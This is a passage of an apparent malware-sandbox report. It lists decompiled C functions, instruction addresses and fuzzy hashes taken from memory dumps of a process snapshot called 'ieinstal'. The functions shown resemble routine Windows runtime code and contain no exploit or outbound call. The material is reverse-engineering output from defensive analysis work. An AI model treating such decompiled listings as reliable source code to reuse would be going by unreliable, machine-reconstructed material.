					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t101 = _v40 + 0xc8;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x1efc3ee2
0x1efc3ee9
0x1efc3eee
0x1efc3ef0
0x1efc3ef3
0x1efc3ef7
0x1efc3efa
0x1efc3f0b
0x1efc4049
0x1efc4049
0x1efc4049
0x1efc3f0f
0x1efc3f14
0x1efc3f29
0x1efc3f32
0x1efc3f35
0x1efc3f3d
0x1efc4050
0x1efc4057
0x1efc4059
0x1efc405c
0x1efc405e
0x1efc4060
0x1efc4063
0x1efc4065
0x1efc4068
0x1efc4068
0x00000000
0x1efc3f43
0x1efc3f45
0x1f02002f
0x1f020034
0x1f020036
0x1efc3fde
0x1efc3fe0
0x1efc3fe3
0x1efc3fe5
0x1efc3fe7
0x1efc3fea
0x1efc3fec
0x1f02003e
0x1f020041
0x1f020041
0x1efc3ffd
0x1efc3fff
0x1efc4002
0x1efc4009
0x1f020054
0x1efc400f
0x1efc400f
0x1efc400f
0x1efc4017
0x1efc401a
0x1f020062
0x1f020062
0x1efc4024
0x1efc402d
0x1efc4037
0x1efc4046
0x1efc4046
0x1efc3f4b
0x1efc3f50
0x1efc3f50
0x1efc3f55
0x1efc3f55
0x1efc3f5a
0x1efc3f5d
0x1efc3f62
0x1efc3f6f
0x1efc3f72
0x1efc3f78
0x1efc3f78
0x1efc3f7a
0x1efc3f80
0x00000000
0x00000000
0x1efc4070
0x1efc4070
0x1efc3f86
0x1efc3f86
0x1efc3f89
0x1efc3f90
0x1efc3f96
0x1efc3f9c
0x1efc3fa1
0x1efc3fa1
0x1efc3faa
0x1efc3faf
0x1efc3fb2
0x1efc3fb8
0x1efc3fc6
0x1efc3fc9
0x1efc3fcc
0x1efc3fce
0x1efc3fd1
0x1efc3fd3
0x1efc3fd9
0x1efc3fdb
0x00000000
0x1efc3fdb

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a404b975c152c3d12d7bb7f250f631b27387296adc9a9c8c187f97116a4179
Instruction ID: c593c2b1453c11b748cc631b4de289b590d8098a97bdf278f12f64263b30c217
Opcode Fuzzy Hash: 43a404b975c152c3d12d7bb7f250f631b27387296adc9a9c8c187f97116a4179
Instruction Fuzzy Hash: E9518275A01656CFCB14DF68C4A0A8DBBF2FB48350F20865AD959A7344DB31AD44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFCB20 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1EFFCB20(void* __ebx, void* __esi, signed int _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				void* __edi;
				void* __ebp;
				intOrPtr _t38;
				signed int _t40;
				signed int _t50;
				signed int _t54;
				signed int _t55;
				signed int _t58;
				signed int _t68;
				signed int _t74;
				signed int* _t75;
				signed int _t77;

				_t38 = _a8;
				_t77 = _a12;
				if(_t38 == 0x80000002) {
					__eflags = _t77;
					if(_t77 == 0) {
						L16:
						return 0xc0000001;
					}
					__eflags = _a16 - 0x1c;
					if(_a16 != 0x1c) {
						goto L16;
					}
					_t40 = E1F0671A4(_a4, _t77);
					L12:
					__eflags = _t40;
					if(_t40 >= 0) {
						L4:
						return 0;
					}
					return _t40;
				}
				if(_t38 == 0) {
					__eflags = _a16 - 4;
					if(_a16 < 4) {
						return 0xc0000023;
					}
					__eflags =  *_t77 - 2;
					if( *_t77 != 2) {
						goto L16;
					}
					_t68 = _a4;
					__eflags =  *((intOrPtr*)(_t68 + 8)) - 0xddeeddee;
					if( *((intOrPtr*)(_t68 + 8)) == 0xddeeddee) {
						goto L4;
					}
					__eflags = ( *(_t68 + 0x40) & 0x75010f63) - 2;
					if(( *(_t68 + 0x40) & 0x75010f63) != 2) {
						L15:
						return 0xc000000d;
					}
					__eflags =  *( *[fs:0x30] + 0x68) & 0x00000800;
					if(__eflags != 0) {
						goto L15;
					}
					_t40 = E1EFFCBA8(__ebx, _t68, 0, __esi, __eflags);
					goto L12;
				}
				if(_t38 != 1) {
					__eflags = _t38 - 3;
					if(_t38 == 3) {
						__eflags = _t77;
						if(_t77 == 0) {
							goto L15;
						}
						__eflags = _a16 - 4;
						if(_a16 < 4) {
							goto L15;
						}
						__eflags =  *_t77 != 1;
						if( *_t77 != 1) {
							goto L15;
						}
						__eflags = _a16 - 8;
						if(_a16 != 8) {
							goto L15;
						}
						__eflags =  *(_t77 + 4);
						if( *(_t77 + 4) != 0) {
							goto L15;
						}
						__eflags = _a4;
						if(__eflags != 0) {
							_push(__ebx);
							E1EFCFED0(0x1f0b4800);
							_t71 = _a4;
							_t50 = E1EFFCC45(_a4);
							__eflags = _t50;
							if(_t50 == 0) {
								E1F06D812(_t71);
							}
							_push(0x1f0b4800);
							E1EFCE740(_t71);
							goto L4;
						}
						_push(0);
						E1F067ABE(__ebx, 0x1f068070, 0, 0, __esi, __eflags);
						goto L4;
					}
					__eflags = _t38 - 4;
					if(_t38 == 4) {
						__eflags =  *0x1f0b6938 & 0x00000001;
						if(( *0x1f0b6938 & 0x00000001) == 0) {
							goto L15;
						}
						_t54 = E1EFC0FB0(1, _t77, 0x1f0b6874, 0x1f080820, 0x1f0b46a0, 0);
						__eflags = _t54;
						if(_t54 < 0) {
							return _t54;
						}
						 *0x1f0b6938 =  *0x1f0b6938 | 0x00000002;
						goto L4;
					}
					__eflags = _t38 - 5;
					if(_t38 == 5) {
						__eflags = _t77;
						if(_t77 == 0) {
							goto L15;
						}
						__eflags = _a16 - 8;
						if(_a16 < 8) {
							goto L15;
						}
						__eflags =  *_t77 - 1;
						if( *_t77 != 1) {
							goto L15;
						}
						_t55 =  *(_t77 + 2) & 0x0000ffff;
						__eflags = _t55 & 0xfffffffe;
						if((_t55 & 0xfffffffe) != 0) {
							goto L15;
						}
						_t40 = E1F07E418(_t77, 0);
						goto L12;
					}
					__eflags = _t38 - 6;
					if(_t38 != 6) {
						goto L4;
					}
					__eflags = _a16 - 0x14;
					if(_a16 < 0x14) {
						goto L15;
					}
					__eflags =  *_t77 - 1;
					if( *_t77 != 1) {
						goto L15;
					}
					_t74 =  *(_t77 + 4);
					__eflags = (_t74 + 0x00000fff & 0xfffff000) - _t74;
					if((_t74 + 0x00000fff & 0xfffff000) != _t74) {
						goto L15;
					}
					_t58 = _a4;
					__eflags = _t58;
					if(_t58 == 0) {
						_t75 = 0x1f0b432c;
						L32:
						_t75[1] =  *(_t77 + 8);
						_t75[3] =  *(_t77 + 0x10);
						 *_t75 =  *(_t77 + 4);
						_t75[2] =  *(_t77 + 0xc);
						goto L4;
					}
					__eflags =  *((intOrPtr*)(_t58 + 8)) - 0xddeeddee;
					if( *((intOrPtr*)(_t58 + 8)) != 0xddeeddee) {
						__eflags =  *(_t58 + 0x44) & 0x01000000;
						if(( *(_t58 + 0x44) & 0x01000000) == 0) {
							L30:
							_t75 = 0xd4 + _t58;
							goto L32;
						}
						return 0;
					}
					0xd4 = 0x18;
					goto L30;
				}
				 *0x1f0b6628 = 0;
				goto L4;
			}

0x1effcb25
0x1effcb28
0x1effcb33
0x1f03878f
0x1f038791
0x1effcba1
0x00000000
0x1effcba1
0x1f038797
0x1f03879b
0x00000000
0x00000000
0x1f0387a4
0x1effcb8d
0x1effcb8d
0x1effcb8f
0x1effcb4e
0x00000000
0x1effcb4e
0x00000000
0x1effcb8f
0x1effcb3b
0x1effcb55
0x1effcb59
0x00000000
0x1effcb93
0x1effcb5b
0x1effcb5e
0x00000000
0x00000000
0x1effcb60
0x1effcb63
0x1effcb6a
0x00000000
0x00000000
0x1effcb74
0x1effcb77
0x1effcb9a
0x00000000
0x1effcb9a
0x1effcb7f
0x1effcb86
0x00000000
0x00000000
0x1effcb88
0x00000000
0x1effcb88
0x1effcb42
0x1f038618
0x1f03861b
0x1f03871f
0x1f038721
0x00000000
0x00000000
0x1f038727
0x1f03872b
0x00000000
0x00000000
0x1f038733
0x1f038736
0x00000000
0x00000000
0x1f03873c
0x1f038740
0x00000000
0x00000000
0x1f038746
0x1f038749
0x00000000
0x00000000
0x1f03874f
0x1f038752
0x1f038766
0x1f03876d
0x1f038772
0x1f038775
0x1f03877a
0x1f03877c
0x1f03877e
0x1f03877e
0x1f038783
0x1f038784
0x00000000
0x1f038789
0x1f038754
0x1f03875c
0x00000000
0x1f03875c
0x1f038621
0x1f038624
0x1f0386e9
0x1f0386f0
0x00000000
0x00000000
0x1f038706
0x1f03870b
0x1f03870d
0x1effcb52
0x1effcb52
0x1f038713
0x00000000
0x1f038713
0x1f03862a
0x1f03862d
0x1f0386b3
0x1f0386b5
0x00000000
0x00000000
0x1f0386bb
0x1f0386bf
0x00000000
0x00000000
0x1f0386c5
0x1f0386c8
0x00000000
0x00000000
0x1f0386ce
0x1f0386d2
0x1f0386d7
0x00000000
0x00000000
0x1f0386df
0x00000000
0x1f0386df
0x1f038633
0x1f038636
0x00000000
0x00000000
0x1f03863c
0x1f038640
0x00000000
0x00000000
0x1f038646
0x1f038648
0x00000000
0x00000000
0x1f03864e
0x1f03865c
0x1f03865e
0x00000000
0x00000000
0x1f038664
0x1f038667
0x1f038669
0x1f038692
0x1f038697
0x1f03869a
0x1f0386a0
0x1f0386a6
0x1f0386ab
0x00000000
0x1f0386ab
0x1f03866b
0x1f038672
0x1f038679
0x1f038680
0x1f03868e
0x1f03868e
0x00000000
0x1f03868e
0x00000000
0x1f038682
0x1f038676
0x00000000
0x1f038676
0x1effcb48
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 482c973ff9b956cf2ba77c6451d5d59e56f5a45dc468b2d3ff9c65578c3802a0
Instruction ID: 8363585d8e7af07f5d98461bdfc5e553b89ab062109969a4e3ea5a50500dce4f
Opcode Fuzzy Hash: 482c973ff9b956cf2ba77c6451d5d59e56f5a45dc468b2d3ff9c65578c3802a0
Instruction Fuzzy Hash: D151F53F900263CFD718CE25C9B0719B3D6EB80215F348B6AEE06CB565D735E581C669

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEEB1C Relevance: .1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E1EFEEB1C(void* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v40;
				void* _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t41;
				intOrPtr _t48;
				void* _t51;
				char* _t55;
				void* _t60;
				intOrPtr _t67;
				void* _t77;
				intOrPtr* _t79;
				signed char _t82;
				intOrPtr* _t91;
				intOrPtr* _t94;
				intOrPtr* _t96;
				void* _t97;
				void* _t99;
				signed int _t101;
				void* _t103;

				_t103 = (_t101 & 0xfffffff8) - 0x14;
				_t94 = _a4;
				_v24 = 0;
				_t77 = __edx;
				_v20 = 0;
				_t99 = __ecx;
				 *_t94 = 0;
				_t41 =  *0x1f0b664c; // 0x333c1b8
				L1EFD2330(_t41 + 4, _t41 + 4);
				_t44 = _t99 + 0x28;
				_v20 = _t99 + 0x28;
				L1EFD2330(_t99 + 0x28, _t44);
				if( *((intOrPtr*)(_t77 + 0x34)) != 0) {
					E1EFD24D0(_v16);
					_t48 =  *0x1f0b664c; // 0x333c1b8
					E1EFD24D0(_t48 + 4);
					_t51 = 0xc0000001;
					L17:
					return _t51;
				}
				if(E1EFD3C40() != 0) {
					_t55 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				} else {
					_t55 = 0x7ffe038e;
				}
				if( *_t55 != 0) {
					E1F04C691(_t77, _t99,  *((intOrPtr*)(_t99 + 0x50)),  *((intOrPtr*)(_t77 + 0x10)),  *(_t77 + 0x24),  *((intOrPtr*)(_t99 + 0x10)),  *((intOrPtr*)(_t99 + 0x14)));
				}
				_t82 = 0;
				 *_t94 = 1;
				_t96 = _t99 + 0x3c;
				 *((intOrPtr*)(_t77 + 0x34)) = 1;
				_t91 = _t96;
				goto L5;
				do {
					L8:
					if( *_t96 != 0) {
						asm("bts ecx, eax");
					}
					_t60 = _t60 + 1;
					_t96 = _t96 + 4;
				} while (_t60 < 5);
				 *((intOrPtr*)(_t99 + 0x34)) =  *((intOrPtr*)(_t99 + 0x34)) - 1;
				if(( *(_t77 + 0x20) & 0x00000004) != 0) {
					 *((intOrPtr*)(_t99 + 0x38)) =  *((intOrPtr*)(_t99 + 0x38)) - 1;
				}
				_t97 = 0;
				if(( *(_t99 + 8) |  *(_t99 + 0xc)) != 0) {
					_push(_t103 + 0x18);
					_push(0);
					_push( *((intOrPtr*)(_t99 + 0x18)));
					_push(_t99 + 0x10);
					_t97 = E1F004550();
					if(_t97 < 0) {
						if(_t97 == 0xc0000034 || _t97 == 0xc0000189) {
							_t97 = 0;
						}
					} else {
						 *(_t99 + 8) =  *(_t103 + 0x18);
						 *(_t99 + 0xc) =  *(_t103 + 0x1c);
					}
				}
				E1EFEF24A( &_v20, _t77, _t77,  &_v24, _t97, _t99,  &_v20);
				E1EFD24D0(_t99 + 0x28);
				_t67 =  *0x1f0b664c; // 0x333c1b8
				E1EFD24D0(_t67 + 4);
				_t79 =  *((intOrPtr*)(_t103 + 0xc));
				if(_t79 != 0) {
					 *0x1f0b91e0(_v20);
					 *_t79();
				}
				L1EFEEC45(_t99);
				_t51 = _t97;
				goto L17;
				L5:
				if(( *(_t77 + 0x24) & 1 << _t82) != 0) {
					 *_t91 =  *_t91 - 1;
				}
				_t82 = _t82 + 1;
				_t91 = _t91 + 4;
				_push(1);
				_pop(1);
				if(_t82 < 5) {
					goto L5;
				} else {
					_t60 = 0;
					goto L8;
				}
			}

0x1efeeb24
0x1efeeb2a
0x1efeeb2f
0x1efeeb33
0x1efeeb35
0x1efeeb39
0x1efeeb3b
0x1efeeb3d
0x1efeeb46
0x1efeeb4b
0x1efeeb4f
0x1efeeb53
0x1efeeb5c
0x1f02fb9c
0x1f02fba1
0x1f02fbaa
0x1f02fbaf
0x1efeec35
0x1efeec3b
0x1efeec3b
0x1efeeb69
0x1f02fbc2
0x1efeeb6f
0x1efeeb6f
0x1efeeb6f
0x1efeeb77
0x1f02fbdf
0x1f02fbdf
0x1efeeb80
0x1efeeb82
0x1efeeb84
0x1efeeb87
0x1efeeb8a
0x1efeeb8a
0x1efeeba7
0x1efeeba7
0x1efeebaa
0x1f02fbe9
0x1f02fbe9
0x1efeebb0
0x1efeebb1
0x1efeebb4
0x1efeebb9
0x1efeebc0
0x1efeebc2
0x1efeebc2
0x1efeebc8
0x1efeebcd
0x1efeebd3
0x1efeebd4
0x1efeebd5
0x1efeebdb
0x1efeebe1
0x1efeebe5
0x1f02fbf7
0x1f02fc05
0x1f02fc05
0x1efeebeb
0x1efeebef
0x1efeebf6
0x1efeebf6
0x1efeebe5
0x1efeec04
0x1efeec0d
0x1efeec12
0x1efeec1b
0x1efeec20
0x1efeec26
0x1f02fc12
0x1f02fc18
0x1f02fc18
0x1efeec2e
0x1efeec33
0x00000000
0x1efeeb8c
0x1efeeb91
0x1efeec3e
0x1efeec3e
0x1efeeb97
0x1efeeb98
0x1efeeb9b
0x1efeeb9d
0x1efeeba1
0x00000000
0x1efeeba3
0x1efeeba5
0x00000000
0x1efeeba5

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57259729444d90640edf1cd98bd819440e7fc48149558942469ae88ef6dd4a3
Instruction ID: 9b479f7306a9c63a157c6e406e14277f5183664d631e4a47107753acf68a7976
Opcode Fuzzy Hash: e57259729444d90640edf1cd98bd819440e7fc48149558942469ae88ef6dd4a3
Instruction Fuzzy Hash: FF41BFB66047418FD711DF28D8A0A4B77E9FF88224F014A6EFC56C7A11DB31F8498B61

Uniqueness

Uniqueness Score: -1.00%

Function 1F03CE40 Relevance: .1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1F03CE40(intOrPtr __edx, intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int* _t83;
				signed int _t85;
				signed int _t91;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t105;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t120;
				signed int* _t121;
				intOrPtr* _t126;
				signed int* _t127;

				_t117 = __edx;
				_t120 = _a12;
				_v16 = 0;
				if( *_t120 == 0x120) {
					if( *((char*)(_t120 + 2)) == 1) {
						_t72 = _a8;
						if((_t72 & 0xfffffffc) == 0) {
							 *(_t120 + 8) = 0;
							 *(_t120 + 0xc) = 0;
							_t97 = _a4;
							_v20 = _t72 & 0x00000001;
							_a8 = _t72 & 0x00000002;
							do {
								_v36 =  *((intOrPtr*)(_t97 + 0x10));
								_t75 =  *((intOrPtr*)(_t97 + 0x14));
								asm("sbb ecx, [ebx+0x34]");
								_v40 = _t75;
								asm("rdtsc");
								 *((intOrPtr*)(_t120 + 0x10)) = _t75 +  *((intOrPtr*)(_t97 + 0x38)) -  *((intOrPtr*)(_t97 + 0x30));
								asm("adc edx, ecx");
								 *((intOrPtr*)(_t120 + 0x14)) = _t117;
								if(_v20 == 0) {
									L12:
									if(_a8 == 0) {
										goto L21;
									}
									_t80 =  *(_t97 + 0x20);
									_t106 =  *(_t97 + 0x24);
									_v28 = _t80;
									_v32 = _t106;
									if((_t80 | _t106) == 0) {
										L20:
										 *((char*)(_t120 + 3)) =  *((intOrPtr*)(_t97 + 0xc));
										goto L21;
									}
									_t118 = 0;
									_t108 = 1;
									_v12 = 0;
									_v8 = 1;
									if( *((intOrPtr*)(_t97 + 0xc)) <= 0) {
										goto L20;
									}
									_t83 = _t120 + 0x24;
									_t126 = _t97 + 0x48;
									_v24 = _t83;
									_t121 = _t83;
									do {
										_t85 = 0 & _v32;
										if((_t108 & _v28 | _t85) != 0) {
											 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
											 *_t121 =  *_t121 & 0x00000000;
											asm("rdpmc");
											_t118 = _v12;
											asm("adc ecx, [esi+0xc]");
											_t121[1] = _t85 -  *_t126 +  *((intOrPtr*)(_t126 + 8));
											_t121[2] = 0;
										}
										_t126 = _t126 + 0x18;
										_t108 = _v8 + _v8;
										_t121 =  &(_t121[4]);
										_t118 = _t118 + 1;
										_v8 = _t108;
										_v12 = _t118;
									} while (_t118 <  *((intOrPtr*)(_t97 + 0xc)));
									_t120 = _a12;
									goto L20;
								}
								_t127 = _t97 + 0x18;
								 *((intOrPtr*)(_t120 + 4)) =  *((intOrPtr*)(_t97 + 8));
								if(( *_t127 | _t127[1]) == 0) {
									goto L12;
								} else {
									goto L9;
								}
								do {
									do {
										L9:
										_t91 =  *_t127;
										_t114 = _t127[1];
										_t119 = _t114;
										_v12 = _t91;
										_v8 = _t114;
										asm("lock cmpxchg8b [esi]");
										_t116 = _v12;
									} while (_t91 != _t116);
									_t92 = _v8;
								} while (_t119 != _t92);
								 *(_t120 + 8) =  *(_t120 + 8) | _t116;
								 *(_t120 + 0xc) =  *(_t120 + 0xc) | _t92;
								_t97 = _a4;
								goto L12;
								L21:
								_t105 = _v16 + 1;
								_t117 =  *((intOrPtr*)(_t97 + 0x14));
								_v16 = _t105;
							} while (_v36 !=  *((intOrPtr*)(_t97 + 0x10)) || _v40 != _t117);
							_t69 = _t105 - 1; // 0x0
							 *((intOrPtr*)(_t120 + 0x18)) = _t69;
							return 0;
						}
						return 0xc00000f0;
					}
					return 0xc00000f1;
				}
				return 0xc0000206;
			}

0x1f03ce40
0x1f03ce49
0x1f03ce53
0x1f03ce59
0x1f03ce69
0x1f03ce75
0x1f03ce7d
0x1f03ce89
0x1f03ce8c
0x1f03ce98
0x1f03ce9c
0x1f03ce9f
0x1f03cea2
0x1f03cea5
0x1f03cea8
0x1f03ceb4
0x1f03ceb7
0x1f03ceba
0x1f03cebe
0x1f03cec1
0x1f03cec7
0x1f03ceca
0x1f03cf09
0x1f03cf0d
0x00000000
0x00000000
0x1f03cf0f
0x1f03cf12
0x1f03cf15
0x1f03cf1a
0x1f03cf1d
0x1f03cf7f
0x1f03cf82
0x00000000
0x1f03cf82
0x1f03cf21
0x1f03cf23
0x1f03cf24
0x1f03cf27
0x1f03cf2d
0x00000000
0x00000000
0x1f03cf2f
0x1f03cf32
0x1f03cf35
0x1f03cf38
0x1f03cf3a
0x1f03cf3f
0x1f03cf44
0x1f03cf46
0x1f03cf4a
0x1f03cf50
0x1f03cf59
0x1f03cf5c
0x1f03cf5f
0x1f03cf62
0x1f03cf62
0x1f03cf68
0x1f03cf6b
0x1f03cf6d
0x1f03cf70
0x1f03cf71
0x1f03cf74
0x1f03cf77
0x1f03cf7c
0x00000000
0x1f03cf7c
0x1f03cecf
0x1f03ced2
0x1f03ceda
0x00000000
0x00000000
0x00000000
0x00000000
0x1f03cedc
0x1f03cedc
0x1f03cedc
0x1f03cedc
0x1f03cede
0x1f03cee1
0x1f03cee3
0x1f03cee6
0x1f03ceee
0x1f03cef2
0x1f03cef5
0x1f03cef9
0x1f03cefc
0x1f03cf00
0x1f03cf03
0x1f03cf06
0x00000000
0x1f03cf85
0x1f03cf8b
0x1f03cf8c
0x1f03cf8f
0x1f03cf92
0x1f03cfa4
0x1f03cfa8
0x00000000
0x1f03cfad
0x00000000
0x1f03ce7f
0x00000000
0x1f03ce6b
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction ID: e8e82ca932620a83255283fe7486f40ebbbf4dfae3c32d5af60064b1b4702ea7
Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction Fuzzy Hash: EB51F375E00606DFCB08CF6AC58169ABBF1BB48315B10C16AD819E7345E734EA91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB7A30 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1EFB7A30(signed short* _a4) {
				char _v24;
				intOrPtr _v28;
				void* _v30;
				intOrPtr _v32;
				short _v44;
				void* _v46;
				void* _v48;
				void* _v52;
				void* _v60;
				void* _v72;
				intOrPtr _t34;
				short _t36;
				intOrPtr _t38;
				signed short _t41;
				signed int _t51;
				intOrPtr _t58;
				short _t60;
				intOrPtr _t68;
				intOrPtr _t73;
				signed int _t77;
				short _t78;
				short _t79;
				intOrPtr _t80;
				signed int _t81;
				void* _t83;

				_t34 =  *[fs:0x30];
				_t83 = (_t81 & 0xfffffff8) - 0x1c;
				_t58 =  *((intOrPtr*)(_t34 + 0x18));
				_t73 =  *((intOrPtr*)(_t34 + 0x10));
				if(E1EFB7B7D(_a4) != 0) {
					_t36 = 0;
					L14:
					return _t36;
				}
				_t62 = _a4;
				if(E1EFD9370(_a4) != 0) {
					_t36 = 0xc0000103;
				} else {
					_t77 =  *(_t73 + 0x26) & 0x0000ffff;
					while(1) {
						_t38 = E1EFD5D90(_t62, _t58, 0, _t77);
						_v28 = _t38;
						if(_t38 == 0) {
							break;
						}
						 *((short*)(_t83 + 0x18)) = 0;
						if(_t77 > 0xffff) {
							 *(_t83 + 0x1a) = 0xffff;
							L25:
							_t78 = 0xc0000095;
							L26:
							E1EFD3BC0(_t58, 0, _t38);
							_t36 = _t78;
							goto L14;
						}
						 *(_t83 + 0x1a) = _t77;
						_t79 = L1EFD8CE0(_a4, _t77, _t38, 0, 0, _t83 + 0x20);
						if(_t79 == 0) {
							_t78 = 0xc0000033;
							L23:
							_t38 =  *((intOrPtr*)(_t83 + 0x1c));
							goto L26;
						}
						_t41 =  *(_t83 + 0x1a);
						_t62 = (_t41 & 0x0000ffff) - 4;
						if(_t79 > (_t41 & 0x0000ffff) - 4) {
							__eflags =  *((char*)( *[fs:0x30] + 3));
							if(__eflags >= 0) {
								_t41 =  *(_t83 + 0x1a);
								goto L7;
							}
							E1EFD3BC0(_t58, 0,  *((intOrPtr*)(_t83 + 0x1c)));
							_t77 = _t79 + 4;
							continue;
						}
						L7:
						_t71 = _t41 & 0x0000ffff;
						if(_t79 > (_t41 & 0x0000ffff)) {
							_t78 = 0xc0000106;
							goto L23;
						}
						_t91 = _t79 - 0xffff;
						if(_t79 > 0xffff) {
							 *((short*)(_t83 + 0x18)) = 0xffff;
							_t38 =  *((intOrPtr*)(_t83 + 0x1c));
							goto L25;
						}
						 *((short*)(_t83 + 0x18)) = _t79;
						_v32 = E1EFF41BB(_t83 + 0x1c, _t71, _t91,  &_v24);
						E1EFD3BC0(_t58, 0,  *((intOrPtr*)(_t83 + 0x1c)));
						_t60 = _v44;
						if(_t60 >= 0) {
							E1EFCFED0(0x1f0b5b40);
							_t68 = _v28;
							_t80 =  *0x1f0b6390; // 0x3332f08
							_push(0x1f0b5b40);
							 *((intOrPtr*)(_t73 + 0x2c)) =  *((intOrPtr*)(_t68 + 4));
							 *((intOrPtr*)(_t73 + 0x28)) =  *((intOrPtr*)(_t68 + 0x10));
							 *((short*)(_t73 + 0x24)) =  *((intOrPtr*)(_t68 + 0xc));
							 *0x1f0b6390 = _t68;
							_t51 = E1EFCE740(_t68);
							if(_t80 != 0) {
								asm("lock xadd [esi], eax");
								if((_t51 | 0xffffffff) == 0) {
									_t25 = _t80 + 4; // 0x90
									_push( *_t25);
									E1F002A80();
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t80);
								}
							}
						}
						_t36 = _t60;
						goto L14;
					}
					_t36 = 0xc0000017;
				}
			}

0x1efb7a38
0x1efb7a3e
0x1efb7a45
0x1efb7a4a
0x1efb7a54
0x1efb7b79
0x1efb7b70
0x1efb7b76
0x1efb7b76
0x1efb7a5a
0x1efb7a64
0x1f01aef2
0x1efb7a6a
0x1efb7a6a
0x1efb7a6e
0x1efb7a72
0x1efb7a77
0x1efb7a7d
0x00000000
0x00000000
0x1efb7a8a
0x1efb7a91
0x1f01af43
0x1f01af48
0x1f01af48
0x1f01af4d
0x1f01af51
0x1f01af56
0x00000000
0x1f01af56
0x1efb7a9b
0x1efb7ab0
0x1efb7ab4
0x1f01af38
0x1f01af3d
0x1f01af3d
0x00000000
0x1f01af3d
0x1efb7aba
0x1efb7ac2
0x1efb7ac7
0x1f01af02
0x1f01af06
0x1f01af1c
0x00000000
0x1f01af1c
0x1f01af0f
0x1f01af14
0x00000000
0x1f01af14
0x1efb7acd
0x1efb7acd
0x1efb7ad2
0x1f01af26
0x00000000
0x1f01af26
0x1efb7add
0x1efb7adf
0x1f01af2d
0x1f01af32
0x00000000
0x1f01af32
0x1efb7ae9
0x1efb7afc
0x1efb7b03
0x1efb7b08
0x1efb7b0e
0x1efb7b15
0x1efb7b1a
0x1efb7b1e
0x1efb7b24
0x1efb7b2c
0x1efb7b32
0x1efb7b39
0x1efb7b3d
0x1efb7b43
0x1efb7b4a
0x1efb7b4f
0x1efb7b53
0x1efb7b55
0x1efb7b55
0x1efb7b58
0x1efb7b69
0x1efb7b69
0x1efb7b53
0x1efb7b4a
0x1efb7b6e
0x00000000
0x1efb7b6e
0x1f01af5d
0x1f01af5d

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b9f5b41e8ac634e7b91feb8d7c05028b3a117a9f2cd735b6b15d3fedf179ef
